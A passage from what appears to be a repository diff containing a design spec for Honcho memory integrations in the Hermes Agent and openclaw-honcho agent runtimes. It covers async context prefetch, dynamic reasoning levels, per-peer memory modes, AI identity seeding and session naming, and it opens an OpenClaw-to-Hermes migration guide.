<p>Move <code>session.context()</code> from <code>before_prompt_build</code> to a post-<code>agent_end</code> background task. Store result in <code>state.contextCache</code>. In <code>before_prompt_build</code>, read from cache instead of calling Honcho. If cache is empty (turn 1), inject nothing — the prompt is still valid without Honcho context on the first turn.</p>
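<p>A minimal sketch of what that cache could look like, treating <code>fetchContext</code> as a stand-in for the real <code>session.context()</code> call (the names here are illustrative, not the plugin's actual API):</p>
<pre><code><span class="cm">// Hypothetical prefetch cache: fire at agent_end, pop at before_prompt_build.</span>
type CacheEntry = { done: boolean; value: ContextResult | null };
const contextCache = new Map&lt;string, CacheEntry&gt;();

function firePrefetch(sessionId: string, fetchContext: () =&gt; Promise&lt;ContextResult&gt;): void {
  const entry: CacheEntry = { done: false, value: null };
  contextCache.set(sessionId, entry);
  <span class="cm">// Fire-and-forget: resolves in the background, never awaited on the response path.</span>
  fetchContext()
    .then((res) =&gt; { entry.value = res; entry.done = true; })
    .catch(() =&gt; { contextCache.delete(sessionId); });
}

function popContextResult(sessionId: string): ContextResult | null {
  const entry = contextCache.get(sessionId);
  if (!entry || !entry.done) return null; <span class="cm">// cold cache or still in flight: inject nothing</span>
  contextCache.delete(sessionId);         <span class="cm">// destructive pop: stale data never accumulates</span>
  return entry.value;
}</code></pre>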
</section>
<!-- SPEC: DYNAMIC REASONING LEVEL -->
<section id="spec-reasoning">
<h2>Spec: dynamic reasoning level</h2>
<h3>Problem</h3>
<p>Honcho's dialectic endpoint supports reasoning levels from <code>minimal</code> to <code>max</code>. A fixed level per tool wastes budget on simple queries and under-serves complex ones.</p>
<h3>Pattern</h3>
<p>Select the reasoning level dynamically based on the user's message. Use the configured default as a floor. Bump by message length. Cap auto-selection at <code>high</code> — never select <code>max</code> automatically.</p>
<h3>Interface contract</h3>
<pre><code><span class="cm">// Shared helper — identical logic in any language</span>
<span class="kw">const</span> LEVELS = [<span class="str">"minimal"</span>, <span class="str">"low"</span>, <span class="str">"medium"</span>, <span class="str">"high"</span>, <span class="str">"max"</span>];
<span class="kw">function</span> <span class="key">dynamicReasoningLevel</span>(
query: <span class="str">string</span>,
configDefault: <span class="str">string</span> = <span class="str">"low"</span>
): <span class="str">string</span> {
<span class="kw">const</span> baseIdx = Math.max(<span class="num">0</span>, LEVELS.indexOf(configDefault));
<span class="kw">const</span> n = query.length;
<span class="kw">const</span> bump = n &lt; <span class="num">120</span> ? <span class="num">0</span> : n &lt; <span class="num">400</span> ? <span class="num">1</span> : <span class="num">2</span>;
<span class="kw">return</span> LEVELS[Math.min(baseIdx + bump, <span class="num">3</span>)]; <span class="cm">// cap at "high" (idx 3)</span>
}</code></pre>
<h3>Config key</h3>
<p>Add a <code>dialecticReasoningLevel</code> config field (string, default <code>"low"</code>). This sets the floor. Users can raise or lower it. The dynamic bump always applies on top.</p>
<h3>openclaw-honcho adoption</h3>
<p>Apply in <code>honcho_recall</code> and <code>honcho_analyze</code>: replace the fixed <code>reasoningLevel</code> with the dynamic selector. <code>honcho_recall</code> should use floor <code>"minimal"</code> and <code>honcho_analyze</code> floor <code>"medium"</code> — both still bump with message length.</p>
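<p>For example, with floor <code>"minimal"</code> a 40-char query stays at <code>minimal</code> and a 500-char query bumps two levels to <code>medium</code>; with floor <code>"medium"</code> the same 500-char query would compute to <code>max</code> but is capped to <code>high</code>.</p>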
</section>
<!-- SPEC: PER-PEER MEMORY MODES -->
<section id="spec-modes">
<h2>Spec: per-peer memory modes</h2>
<h3>Problem</h3>
<p>Users want independent control over whether user context and agent context are written locally, to Honcho, or both. A single <code>memoryMode</code> shorthand is not granular enough.</p>
<h3>Pattern</h3>
<p>Three modes per peer: <code>hybrid</code> (write both local + Honcho), <code>honcho</code> (Honcho only, disable local files), <code>local</code> (local files only, skip Honcho sync for this peer). Two orthogonal axes: user peer and agent peer.</p>
<h3>Config schema</h3>
<pre><code><span class="cm">// ~/.openclaw/openclaw.json (or ~/.nanobot/config.json)</span>
{
<span class="str">"plugins"</span>: {
<span class="str">"openclaw-honcho"</span>: {
<span class="str">"config"</span>: {
<span class="str">"apiKey"</span>: <span class="str">"..."</span>,
<span class="str">"memoryMode"</span>: <span class="str">"hybrid"</span>, <span class="cm">// shorthand: both peers</span>
<span class="str">"userMemoryMode"</span>: <span class="str">"honcho"</span>, <span class="cm">// override for user peer</span>
<span class="str">"agentMemoryMode"</span>: <span class="str">"hybrid"</span> <span class="cm">// override for agent peer</span>
}
}
}
}</code></pre>
<h3>Resolution order</h3>
<ol>
<li>Per-peer field (<code>userMemoryMode</code> / <code>agentMemoryMode</code>) — wins if present.</li>
<li>Shorthand <code>memoryMode</code> — applies to both peers as default.</li>
<li>Hardcoded default: <code>"hybrid"</code>.</li>
</ol>
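<p>The resolution order above reduces to a few lines. A sketch, assuming the config object shape from the schema (the helper name is illustrative):</p>
<pre><code>type MemoryMode = "hybrid" | "honcho" | "local";

<span class="cm">// Hypothetical resolver: per-peer field wins, then shorthand, then "hybrid".</span>
function resolveMemoryMode(
  cfg: { memoryMode?: MemoryMode; userMemoryMode?: MemoryMode; agentMemoryMode?: MemoryMode },
  peer: "user" | "agent"
): MemoryMode {
  const perPeer = peer === "user" ? cfg.userMemoryMode : cfg.agentMemoryMode;
  return perPeer ?? cfg.memoryMode ?? "hybrid";
}</code></pre>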
<h3>Effect on Honcho sync</h3>
<ul>
<li><code>userMemoryMode=local</code>: skip adding user peer messages to Honcho.</li>
<li><code>agentMemoryMode=local</code>: skip adding assistant peer messages to Honcho.</li>
<li>Both local: skip <code>session.addMessages()</code> entirely.</li>
<li><code>userMemoryMode=honcho</code>: disable local USER.md writes.</li>
<li><code>agentMemoryMode=honcho</code>: disable local MEMORY.md / SOUL.md writes.</li>
</ul>
</section>
<!-- SPEC: AI PEER IDENTITY -->
<section id="spec-identity">
<h2>Spec: AI peer identity formation</h2>
<h3>Problem</h3>
<p>Honcho builds the user's representation organically by observing what the user says. The same mechanism exists for the AI peer — but only if <code>observe_me=True</code> is set for the agent peer. Without it, the agent peer accumulates nothing and Honcho's AI-side model never forms.</p>
<p>Additionally, existing persona files (SOUL.md, IDENTITY.md) should seed the AI peer's Honcho representation at first activation, rather than waiting for it to emerge from scratch.</p>
<h3>Part A: observe_me=True for agent peer</h3>
<pre><code><span class="cm">// TypeScript — in session.addPeers() call</span>
<span class="kw">await</span> session.addPeers([
[ownerPeer.id, { observeMe: <span class="kw">true</span>, observeOthers: <span class="kw">false</span> }],
[agentPeer.id, { observeMe: <span class="kw">true</span>, observeOthers: <span class="kw">true</span> }], <span class="cm">// was false</span>
]);</code></pre>
<p>This is a one-line change but foundational. Without it, Honcho's AI peer representation stays empty regardless of what the agent says.</p>
<h3>Part B: seedAiIdentity()</h3>
<pre><code><span class="kw">async function</span> <span class="key">seedAiIdentity</span>(
agentPeer: Peer,
content: <span class="str">string</span>,
source: <span class="str">string</span>
): Promise&lt;<span class="kw">boolean</span>&gt; {
<span class="kw">const</span> wrapped = [
<span class="str">`&lt;ai_identity_seed&gt;`</span>,
<span class="str">`&lt;source&gt;${source}&lt;/source&gt;`</span>,
<span class="str">``</span>,
content.trim(),
<span class="str">`&lt;/ai_identity_seed&gt;`</span>,
].join(<span class="str">"\n"</span>);
<span class="kw">await</span> agentPeer.addMessage(<span class="str">"assistant"</span>, wrapped);
<span class="kw">return true</span>;
}</code></pre>
<h3>Part C: migrate agent files at setup</h3>
<p>During <code>openclaw honcho setup</code>, upload agent-self files (SOUL.md, IDENTITY.md, AGENTS.md, BOOTSTRAP.md) to the agent peer using <code>seedAiIdentity()</code> instead of <code>session.uploadFile()</code>. This routes the content through Honcho's observation pipeline rather than the file store.</p>
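<p>A sketch of that setup-time loop, assuming Node's standard <code>fs/promises</code> API and the <code>seedAiIdentity()</code> helper from Part B (file locations and error handling are illustrative):</p>
<pre><code>import { readFile } from "node:fs/promises";

<span class="cm">// Hypothetical migration loop: seed each agent-self file through the observation pipeline.</span>
const seedFiles = ["SOUL.md", "IDENTITY.md", "AGENTS.md", "BOOTSTRAP.md"];
for (const name of seedFiles) {
  try {
    const content = await readFile(name, "utf8");
    await seedAiIdentity(agentPeer, content, name);
  } catch {
    <span class="cm">// File absent in this workspace: skip silently.</span>
  }
}</code></pre>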
<h3>Part D: AI peer name in identity</h3>
<p>When the agent has a configured name (non-default), inject it into the agent's self-identity prefix. In OpenClaw this means adding to the injected system prompt section:</p>
<pre><code><span class="cm">// In context hook return value</span>
<span class="kw">return</span> {
systemPrompt: [
agentName ? <span class="str">`You are ${agentName}.`</span> : <span class="str">""</span>,
<span class="str">"## User Memory Context"</span>,
...sections,
].filter(Boolean).join(<span class="str">"\n\n"</span>)
};</code></pre>
<h3>CLI surface: honcho identity subcommand</h3>
<pre><code>openclaw honcho identity &lt;file&gt; <span class="cm"># seed from file</span>
openclaw honcho identity --show <span class="cm"># show current AI peer representation</span></code></pre>
</section>
<!-- SPEC: SESSION NAMING -->
<section id="spec-sessions">
<h2>Spec: session naming strategies</h2>
<h3>Problem</h3>
<p>When Honcho is used across multiple projects or directories, a single global session means every project shares the same context. Per-directory sessions provide isolation without requiring users to name sessions manually.</p>
<h3>Strategies</h3>
<div class="table-wrap">
<table>
<thead><tr><th>Strategy</th><th>Session key</th><th>When to use</th></tr></thead>
<tbody>
<tr><td><code>per-directory</code></td><td>basename of CWD</td><td>Default. Each project gets its own session.</td></tr>
<tr><td><code>global</code></td><td>fixed string <code>"global"</code></td><td>Single cross-project session.</td></tr>
<tr><td>manual map</td><td>user-configured per path</td><td><code>sessions</code> config map overrides directory basename.</td></tr>
<tr><td>title-based</td><td>sanitized session title</td><td>When agent supports named sessions; title set mid-conversation.</td></tr>
</tbody>
</table>
</div>
<h3>Config schema</h3>
<pre><code>{
<span class="str">"sessionStrategy"</span>: <span class="str">"per-directory"</span>, <span class="cm">// "per-directory" | "global"</span>
<span class="str">"sessionPeerPrefix"</span>: <span class="kw">false</span>, <span class="cm">// prepend peer name to session key</span>
<span class="str">"sessions"</span>: { <span class="cm">// manual overrides</span>
<span class="str">"/home/user/projects/foo"</span>: <span class="str">"foo-project"</span>
}
}</code></pre>
<h3>CLI surface</h3>
<pre><code>openclaw honcho sessions <span class="cm"># list all mappings</span>
openclaw honcho map &lt;name&gt; <span class="cm"># map cwd to session name</span>
openclaw honcho map <span class="cm"># no-arg = list mappings</span></code></pre>
<p>Resolution order: manual map wins &rarr; session title &rarr; directory basename &rarr; platform key.</p>
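<p>A sketch of that resolution chain, assuming the config schema above and Node's <code>path</code> module (the function name, <code>platformKey</code> fallback argument, and sanitizer are illustrative):</p>
<pre><code>import { basename } from "node:path";

<span class="cm">// Hypothetical resolver: manual map → title → strategy-derived key → platform key.</span>
function resolveSessionKey(
  cfg: { sessionStrategy?: "per-directory" | "global"; sessions?: Record&lt;string, string&gt; },
  cwd: string,
  sessionTitle: string | null,
  platformKey: string
): string {
  if (cfg.sessions &amp;&amp; cfg.sessions[cwd]) return cfg.sessions[cwd];
  if (sessionTitle) return sanitize(sessionTitle);
  if (cfg.sessionStrategy === "global") return "global";
  return basename(cwd) || platformKey;
}

<span class="cm">// Minimal sanitizer for title-based keys.</span>
function sanitize(title: string): string {
  return title.toLowerCase().replace(/[^a-z0-9]+/g, "-").replace(/^-+|-+$/g, "");
}</code></pre>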
</section>
<!-- SPEC: CLI SURFACE INJECTION -->
<section id="spec-cli">
<h2>Spec: CLI surface injection</h2>
<h3>Problem</h3>
<p>When a user asks "how do I change my memory settings?" or "what Honcho commands are available?" the agent either hallucinates or says it doesn't know. The agent should know its own management interface.</p>
<h3>Pattern</h3>
<p>When Honcho is active, append a compact command reference to the system prompt. The agent can cite these commands directly instead of guessing.</p>
<pre><code><span class="cm">// In context hook, append to systemPrompt</span>
<span class="kw">const</span> honchoSection = [
<span class="str">"# Honcho memory integration"</span>,
<span class="str">`Active. Session: ${sessionKey}. Mode: ${mode}.`</span>,
<span class="str">"Management commands:"</span>,
<span class="str">" openclaw honcho status — show config + connection"</span>,
<span class="str">" openclaw honcho mode [hybrid|honcho|local] — show or set memory mode"</span>,
<span class="str">" openclaw honcho sessions — list session mappings"</span>,
<span class="str">" openclaw honcho map &lt;name&gt; — map directory to session"</span>,
<span class="str">" openclaw honcho identity [file] [--show] — seed or show AI identity"</span>,
<span class="str">" openclaw honcho setup — full interactive wizard"</span>,
].join(<span class="str">"\n"</span>);</code></pre>
<div class="callout warn">
<strong>Keep it compact.</strong> This section is injected every turn. Keep it to a few hundred characters. List commands, not explanations — the agent can explain them on request.
</div>
</section>
<!-- OPENCLAW CHECKLIST -->
<section id="openclaw-checklist">
<h2>openclaw-honcho checklist</h2>
<p>Ordered by impact. Each item maps to a spec section above.</p>
<ul class="checklist">
<li class="todo"><strong>Async prefetch</strong> — move <code>session.context()</code> out of <code>before_prompt_build</code> into post-<code>agent_end</code> background Promise. Pop from cache at prompt build. (<a href="#spec-async">spec</a>)</li>
<li class="todo"><strong>observe_me=True for agent peer</strong> — one-line change in <code>session.addPeers()</code> config for agent peer. (<a href="#spec-identity">spec</a>)</li>
<li class="todo"><strong>Dynamic reasoning level</strong> — add <code>dynamicReasoningLevel()</code> helper; apply in <code>honcho_recall</code> and <code>honcho_analyze</code>. Add <code>dialecticReasoningLevel</code> to config schema. (<a href="#spec-reasoning">spec</a>)</li>
<li class="todo"><strong>Per-peer memory modes</strong> — add <code>userMemoryMode</code> / <code>agentMemoryMode</code> to config; gate Honcho sync and local writes accordingly. (<a href="#spec-modes">spec</a>)</li>
<li class="todo"><strong>seedAiIdentity()</strong> — add helper; apply during setup migration for SOUL.md / IDENTITY.md instead of <code>session.uploadFile()</code>. (<a href="#spec-identity">spec</a>)</li>
<li class="todo"><strong>Session naming strategies</strong> — add <code>sessionStrategy</code>, <code>sessions</code> map, <code>sessionPeerPrefix</code> to config; implement resolution function. (<a href="#spec-sessions">spec</a>)</li>
<li class="todo"><strong>CLI surface injection</strong> — append command reference to <code>before_prompt_build</code> return value when Honcho is active. (<a href="#spec-cli">spec</a>)</li>
<li class="todo"><strong>honcho identity subcommand</strong> — add <code>openclaw honcho identity</code> CLI command. (<a href="#spec-identity">spec</a>)</li>
<li class="todo"><strong>AI peer name injection</strong> — if <code>aiPeer</code> name configured, prepend to injected system prompt. (<a href="#spec-identity">spec</a>)</li>
<li class="todo"><strong>honcho mode / honcho sessions / honcho map</strong> — CLI parity with Hermes. (<a href="#spec-sessions">spec</a>)</li>
</ul>
<div class="callout success">
<strong>Already done in openclaw-honcho (do not re-implement):</strong> lastSavedIndex dedup, platform metadata stripping, multi-agent parent observer hierarchy, peerPerspective on context(), tiered tool surface (fast/LLM), workspace agentPeerMap, QMD passthrough, self-hosted Honcho support.
</div>
</section>
<!-- NANOBOT CHECKLIST -->
<section id="nanobot-checklist">
<h2>nanobot-honcho checklist</h2>
<p>nanobot-honcho is a greenfield integration. Start from openclaw-honcho's architecture (hook-based, dual peer) and apply all Hermes patterns from day one rather than retrofitting. Priority order:</p>
<h3>Phase 1 — core correctness</h3>
<ul class="checklist">
<li class="todo">Dual peer model (owner + agent peer), both with <code>observe_me=True</code></li>
<li class="todo">Message capture at turn end with <code>lastSavedIndex</code> dedup</li>
<li class="todo">Platform metadata stripping before Honcho storage</li>
<li class="todo">Async prefetch from day one — do not implement blocking context injection</li>
<li class="todo">Legacy file migration at first activation (USER.md → owner peer, SOUL.md → <code>seedAiIdentity()</code>)</li>
</ul>
<h3>Phase 2 — configuration</h3>
<ul class="checklist">
<li class="todo">Config schema: <code>apiKey</code>, <code>workspaceId</code>, <code>baseUrl</code>, <code>memoryMode</code>, <code>userMemoryMode</code>, <code>agentMemoryMode</code>, <code>dialecticReasoningLevel</code>, <code>sessionStrategy</code>, <code>sessions</code></li>
<li class="todo">Per-peer memory mode gating</li>
<li class="todo">Dynamic reasoning level</li>
<li class="todo">Session naming strategies</li>
</ul>
<h3>Phase 3 — tools and CLI</h3>
<ul class="checklist">
<li class="todo">Tool surface: <code>honcho_profile</code>, <code>honcho_recall</code>, <code>honcho_analyze</code>, <code>honcho_search</code>, <code>honcho_context</code></li>
<li class="todo">CLI: <code>setup</code>, <code>status</code>, <code>sessions</code>, <code>map</code>, <code>mode</code>, <code>identity</code></li>
<li class="todo">CLI surface injection into system prompt</li>
<li class="todo">AI peer name wired into agent identity</li>
</ul>
</section>
</div>
<script type="module">
import mermaid from 'https://cdn.jsdelivr.net/npm/mermaid@11/dist/mermaid.esm.min.mjs';
mermaid.initialize({ startOnLoad: true, securityLevel: 'loose', fontFamily: 'Departure Mono, Noto Emoji, monospace' });
</script>
<script>
window.addEventListener('scroll', () => {
const bar = document.getElementById('progress');
const max = document.documentElement.scrollHeight - window.innerHeight;
bar.style.width = (max > 0 ? (window.scrollY / max) * 100 : 0) + '%';
});
</script>
</body>
</html>


@@ -0,0 +1,377 @@
# honcho-integration-spec
Comparison of Hermes Agent vs. openclaw-honcho — and a porting spec for bringing Hermes patterns into other Honcho integrations.
---
## Overview
Two independent Honcho integrations have been built for two different agent runtimes: **Hermes Agent** (Python, baked into the runner) and **openclaw-honcho** (TypeScript plugin via hook/tool API). Both use the same Honcho peer paradigm — dual peer model, `session.context()`, `peer.chat()` — but they made different tradeoffs at every layer.
This document maps those tradeoffs and defines a porting spec: a set of Hermes-originated patterns, each stated as an integration-agnostic interface, that any Honcho integration can adopt regardless of runtime or language.
> **Scope** Both integrations work correctly today. This spec is about the delta — patterns in Hermes that are worth propagating and patterns in openclaw-honcho that Hermes should eventually adopt. The spec is additive, not prescriptive.
---
## Architecture comparison
### Hermes: baked-in runner
Honcho is initialised directly inside `AIAgent.__init__`. There is no plugin boundary. Session management, context injection, async prefetch, and CLI surface are all first-class concerns of the runner. Context is injected once per session (baked into `_cached_system_prompt`) and never re-fetched mid-session — this maximises prefix cache hits at the LLM provider.
Turn flow:
```
user message
→ _honcho_prefetch() (reads cache — no HTTP)
→ _build_system_prompt() (first turn only, cached)
→ LLM call
→ response
→ _honcho_fire_prefetch() (daemon threads, turn end)
→ prefetch_context() thread ──┐
→ prefetch_dialectic() thread ─┴→ _context_cache / _dialectic_cache
```
### openclaw-honcho: hook-based plugin
The plugin registers hooks against OpenClaw's event bus. Context is fetched synchronously inside `before_prompt_build` on every turn. Message capture happens in `agent_end`. The multi-agent hierarchy is tracked via `subagent_spawned`. This model is correct but every turn pays a blocking Honcho round-trip before the LLM call can begin.
Turn flow:
```
user message
→ before_prompt_build (BLOCKING HTTP — every turn)
→ session.context()
→ system prompt assembled
→ LLM call
→ response
→ agent_end hook
→ session.addMessages()
→ session.setMetadata()
```
---
## Diff table
| Dimension | Hermes Agent | openclaw-honcho |
|---|---|---|
| **Context injection timing** | Once per session (cached). Zero HTTP on response path after turn 1. | Every turn, blocking. Fresh context per turn but adds latency. |
| **Prefetch strategy** | Daemon threads fire at turn end; consumed next turn from cache. | None. Blocking call at prompt-build time. |
| **Dialectic (peer.chat)** | Prefetched async; result injected into system prompt next turn. | On-demand via `honcho_recall` / `honcho_analyze` tools. |
| **Reasoning level** | Dynamic: scales with message length. Floor = config default. Cap = "high". | Fixed per tool: recall=minimal, analyze=medium. |
| **Memory modes** | `user_memory_mode` / `agent_memory_mode`: hybrid / honcho / local. | None. Always writes to Honcho. |
| **Write frequency** | async (background queue), turn, session, N turns. | After every agent_end (no control). |
| **AI peer identity** | `observe_me=True`, `seed_ai_identity()`, `get_ai_representation()`, SOUL.md → AI peer. | Agent files uploaded to agent peer at setup. No ongoing self-observation. |
| **Context scope** | User peer + AI peer representation, both injected. | User peer (owner) representation + conversation summary. `peerPerspective` on context call. |
| **Session naming** | per-directory / global / manual map / title-based. | Derived from platform session key. |
| **Multi-agent** | Single-agent only. | Parent observer hierarchy via `subagent_spawned`. |
| **Tool surface** | Single `query_user_context` tool (on-demand dialectic). | 6 tools: session, profile, search, context (fast) + recall, analyze (LLM). |
| **Platform metadata** | Not stripped. | Explicitly stripped before Honcho storage. |
| **Message dedup** | None. | `lastSavedIndex` in session metadata prevents re-sending. |
| **CLI surface in prompt** | Management commands injected into system prompt. Agent knows its own CLI. | Not injected. |
| **AI peer name in identity** | Replaces "Hermes Agent" in DEFAULT_AGENT_IDENTITY when configured. | Not implemented. |
| **QMD / local file search** | Not implemented. | Passthrough tools when QMD backend configured. |
| **Workspace metadata** | Not implemented. | `agentPeerMap` in workspace metadata tracks agent→peer ID. |
---
## Patterns
Six patterns from Hermes are worth adopting in any Honcho integration. Each is described as an integration-agnostic interface.
**Hermes contributes:**
- Async prefetch (zero-latency)
- Dynamic reasoning level
- Per-peer memory modes
- AI peer identity formation
- Session naming strategies
- CLI surface injection
**openclaw-honcho contributes back (Hermes should adopt):**
- `lastSavedIndex` dedup
- Platform metadata stripping
- Multi-agent observer hierarchy
- `peerPerspective` on `context()`
- Tiered tool surface (fast/LLM)
- Workspace `agentPeerMap`
---
## Spec: async prefetch
### Problem
Calling `session.context()` and `peer.chat()` synchronously before each LLM call adds 200–800 ms of Honcho round-trip latency to every turn.
### Pattern
Fire both calls as non-blocking background work at the **end** of each turn. Store results in a per-session cache keyed by session ID. At the **start** of the next turn, pop from cache — the HTTP is already done. First turn is cold (empty cache); all subsequent turns are zero-latency on the response path.
### Interface contract
```typescript
interface AsyncPrefetch {
// Fire context + dialectic fetches at turn end. Non-blocking.
firePrefetch(sessionId: string, userMessage: string): void;
// Pop cached results at turn start. Returns empty if cache is cold.
popContextResult(sessionId: string): ContextResult | null;
popDialecticResult(sessionId: string): string | null;
}
type ContextResult = {
representation: string;
card: string[];
aiRepresentation?: string; // AI peer context if enabled
summary?: string; // conversation summary if fetched
};
```
### Implementation notes
- **Python:** `threading.Thread(daemon=True)`. Write to `dict[session_id, result]` — GIL makes this safe for simple writes.
- **TypeScript:** store the in-flight `Promise` in a `Map<string, Promise<ContextResult>>` and track whether it has settled. At pop time, return the value only if it has already resolved; if it is still in flight, return null rather than awaiting.
- The pop is destructive: clears the cache entry after reading so stale data never accumulates.
- Prefetch should also fire on first turn (even though it won't be consumed until turn 2).
### openclaw-honcho adoption
Move `session.context()` from `before_prompt_build` to a post-`agent_end` background task. Store result in `state.contextCache`. In `before_prompt_build`, read from cache instead of calling Honcho. If cache is empty (turn 1), inject nothing — the prompt is still valid without Honcho context on the first turn.
---
## Spec: dynamic reasoning level
### Problem
Honcho's dialectic endpoint supports reasoning levels from `minimal` to `max`. A fixed level per tool wastes budget on simple queries and under-serves complex ones.
### Pattern
Select the reasoning level dynamically based on the user's message. Use the configured default as a floor. Bump by message length. Cap auto-selection at `high` — never select `max` automatically.
### Logic
```
< 120 chars → default (typically "low")
120–400 chars → one level above default (cap at "high")
> 400 chars → two levels above default (cap at "high")
```
### Config key
Add `dialecticReasoningLevel` (string, default `"low"`). This sets the floor. The dynamic bump always applies on top.
### openclaw-honcho adoption
Apply in `honcho_recall` and `honcho_analyze`: replace fixed `reasoningLevel` with the dynamic selector. `honcho_recall` uses floor `"minimal"`, `honcho_analyze` uses floor `"medium"` — both still bump with message length.
---
## Spec: per-peer memory modes
### Problem
Users want independent control over whether user context and agent context are written locally, to Honcho, or both.
### Modes
| Mode | Effect |
|---|---|
| `hybrid` | Write to both local files and Honcho (default) |
| `honcho` | Honcho only — disable corresponding local file writes |
| `local` | Local files only — skip Honcho sync for this peer |
### Config schema
```json
{
"memoryMode": "hybrid",
"userMemoryMode": "honcho",
"agentMemoryMode": "hybrid"
}
```
Resolution order: per-peer field wins → shorthand `memoryMode` → default `"hybrid"`.
### Effect on Honcho sync
- `userMemoryMode=local`: skip adding user peer messages to Honcho
- `agentMemoryMode=local`: skip adding assistant peer messages to Honcho
- Both local: skip `session.addMessages()` entirely
- `userMemoryMode=honcho`: disable local USER.md writes
- `agentMemoryMode=honcho`: disable local MEMORY.md / SOUL.md writes
---
## Spec: AI peer identity formation
### Problem
Honcho builds the user's representation organically by observing what the user says. The same mechanism exists for the AI peer — but only if `observe_me=True` is set for the agent peer. Without it, the agent peer accumulates nothing.
Additionally, existing persona files (SOUL.md, IDENTITY.md) should seed the AI peer's Honcho representation at first activation.
### Part A: observe_me=True for agent peer
```typescript
await session.addPeers([
[ownerPeer.id, { observeMe: true, observeOthers: false }],
[agentPeer.id, { observeMe: true, observeOthers: true }], // was false
]);
```
One-line change. Foundational. Without it, the AI peer representation stays empty regardless of what the agent says.
### Part B: seedAiIdentity()
```typescript
async function seedAiIdentity(
agentPeer: Peer,
content: string,
source: string
): Promise<boolean> {
const wrapped = [
`<ai_identity_seed>`,
`<source>${source}</source>`,
``,
content.trim(),
`</ai_identity_seed>`,
].join("\n");
await agentPeer.addMessage("assistant", wrapped);
return true;
}
```
### Part C: migrate agent files at setup
During `honcho setup`, upload agent-self files (SOUL.md, IDENTITY.md, AGENTS.md) to the agent peer via `seedAiIdentity()` instead of `session.uploadFile()`. This routes content through Honcho's observation pipeline.
### Part D: AI peer name in identity
When the agent has a configured name, prepend it to the injected system prompt:
```typescript
const namePrefix = agentName ? `You are ${agentName}.\n\n` : "";
return { systemPrompt: namePrefix + "## User Memory Context\n\n" + sections };
```
### CLI surface
```
honcho identity <file> # seed from file
honcho identity --show # show current AI peer representation
```
---
## Spec: session naming strategies
### Problem
A single global session means every project shares the same Honcho context. Per-directory sessions provide isolation without requiring users to name sessions manually.
### Strategies
| Strategy | Session key | When to use |
|---|---|---|
| `per-directory` | basename of CWD | Default. Each project gets its own session. |
| `global` | fixed string `"global"` | Single cross-project session. |
| manual map | user-configured per path | `sessions` config map overrides directory basename. |
| title-based | sanitized session title | When the agent supports named sessions; title set mid-conversation. |
### Config schema
```json
{
"sessionStrategy": "per-directory",
"sessionPeerPrefix": false,
"sessions": {
"/home/user/projects/foo": "foo-project"
}
}
```
### CLI surface
```
honcho sessions # list all mappings
honcho map <name> # map cwd to session name
honcho map # no-arg = list mappings
```
Resolution order: manual map → session title → directory basename → platform key.
---
## Spec: CLI surface injection
### Problem
When a user asks "how do I change my memory settings?" the agent either hallucinates or says it doesn't know. The agent should know its own management interface.
### Pattern
When Honcho is active, append a compact command reference to the system prompt. Keep it to a few hundred chars.
```
# Honcho memory integration
Active. Session: {sessionKey}. Mode: {mode}.
Management commands:
honcho status — show config + connection
honcho mode [hybrid|honcho|local] — show or set memory mode
honcho sessions — list session mappings
honcho map <name> — map directory to session
honcho identity [file] [--show] — seed or show AI identity
honcho setup — full interactive wizard
```
---
## openclaw-honcho checklist
Ordered by impact:
- [ ] **Async prefetch** — move `session.context()` out of `before_prompt_build` into post-`agent_end` background Promise
- [ ] **observe_me=True for agent peer** — one-line change in `session.addPeers()`
- [ ] **Dynamic reasoning level** — add helper; apply in `honcho_recall` and `honcho_analyze`; add `dialecticReasoningLevel` to config
- [ ] **Per-peer memory modes** — add `userMemoryMode` / `agentMemoryMode` to config; gate Honcho sync and local writes
- [ ] **seedAiIdentity()** — add helper; use during setup migration for SOUL.md / IDENTITY.md
- [ ] **Session naming strategies** — add `sessionStrategy`, `sessions` map, `sessionPeerPrefix`
- [ ] **CLI surface injection** — append command reference to `before_prompt_build` return value
- [ ] **honcho identity subcommand** — seed from file or `--show` current representation
- [ ] **AI peer name injection** — if `aiPeer` name configured, prepend to injected system prompt
- [ ] **honcho mode / sessions / map** — CLI parity with Hermes
Already done in openclaw-honcho (do not re-implement): `lastSavedIndex` dedup, platform metadata stripping, multi-agent parent observer, `peerPerspective` on `context()`, tiered tool surface, workspace `agentPeerMap`, QMD passthrough, self-hosted Honcho.
---
## nanobot-honcho checklist
Greenfield integration. Start from openclaw-honcho's architecture and apply all Hermes patterns from day one.
### Phase 1 — core correctness
- [ ] Dual peer model (owner + agent peer), both with `observe_me=True`
- [ ] Message capture at turn end with `lastSavedIndex` dedup
- [ ] Platform metadata stripping before Honcho storage
- [ ] Async prefetch from day one — do not implement blocking context injection
- [ ] Legacy file migration at first activation (USER.md → owner peer, SOUL.md → `seedAiIdentity()`)
### Phase 2 — configuration
- [ ] Config schema: `apiKey`, `workspaceId`, `baseUrl`, `memoryMode`, `userMemoryMode`, `agentMemoryMode`, `dialecticReasoningLevel`, `sessionStrategy`, `sessions`
- [ ] Per-peer memory mode gating
- [ ] Dynamic reasoning level
- [ ] Session naming strategies
### Phase 3 — tools and CLI
- [ ] Tool surface: `honcho_profile`, `honcho_recall`, `honcho_analyze`, `honcho_search`, `honcho_context`
- [ ] CLI: `setup`, `status`, `sessions`, `map`, `mode`, `identity`
- [ ] CLI surface injection into system prompt
- [ ] AI peer name wired into agent identity

docs/migration/openclaw.md

@@ -0,0 +1,110 @@
# Migrating from OpenClaw to Hermes Agent
This guide covers how to import your OpenClaw settings, memories, skills, and API keys into Hermes Agent.
## Three Ways to Migrate
### 1. Automatic (during first-time setup)
When you run `hermes setup` for the first time and Hermes detects `~/.openclaw`, it automatically offers to import your OpenClaw data before configuration begins. Just accept the prompt and everything is handled for you.
### 2. CLI Command (quick, scriptable)
```bash
hermes claw migrate # Full migration with confirmation prompt
hermes claw migrate --dry-run # Preview what would happen
hermes claw migrate --preset user-data # Migrate without API keys/secrets
hermes claw migrate --yes # Skip confirmation prompt
```
**All options:**
| Flag | Description |
|------|-------------|
| `--source PATH` | Path to OpenClaw directory (default: `~/.openclaw`) |
| `--dry-run` | Preview only — no files are modified |
| `--preset {user-data,full}` | Migration preset (default: `full`). `user-data` excludes secrets |
| `--overwrite` | Overwrite existing files (default: skip conflicts) |
| `--migrate-secrets` | Include allowlisted secrets (auto-enabled with `full` preset) |
| `--workspace-target PATH` | Copy workspace instructions (AGENTS.md) to this absolute path |
| `--skill-conflict {skip,overwrite,rename}` | How to handle skill name conflicts (default: `skip`) |
| `--yes`, `-y` | Skip confirmation prompts |
### 3. Agent-Guided (interactive, with previews)
Ask the agent to run the migration for you:
```
> Migrate my OpenClaw setup to Hermes
```
